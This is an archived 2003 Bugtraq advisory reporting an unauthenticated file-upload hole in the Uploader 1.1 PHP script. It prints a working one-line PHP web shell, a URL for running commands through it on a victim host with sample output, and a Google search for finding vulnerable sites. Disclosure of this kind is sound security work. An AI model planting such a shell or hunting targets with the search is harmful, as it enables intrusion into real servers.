lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 4 Mar 2003 01:15:47 +0100 (MET)
From: kingcope@....net
To: bugtraq@...urityfocus.com
Subject: uploader.php vulnerability


Uploader Version 1.1 which is available from
http://www.phpscriptcenter.com/uploader.php
includes "uploader.php", which lets you upload ANY file (even scripts eg. in
PHP) onto the server
if no password protection is specified in the configuration file (default
set to off).
The supplied files will be uploaded into directory "uploads" if not
otherwise configured.

So if we create a file like this:

<?php 
$cmd = $_GET["cmd"];
system("$cmd"); 
?>

and upload it as "shellemul.php", we can execute commands by targeting our
browser to 
http://www.victim.com/uploads/shellemul.php?cmd=id
which will give us -->
uid=48(apache) gid=48(apache) groups=48(apache)

We could even upload PHPShell and have more comfortable fun.
---
Google gets me 411 hits for "allinurl: uploader.php"
---
by kcope (kingcope@....net)

-- 
+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!

Powered by blists - more mailing lists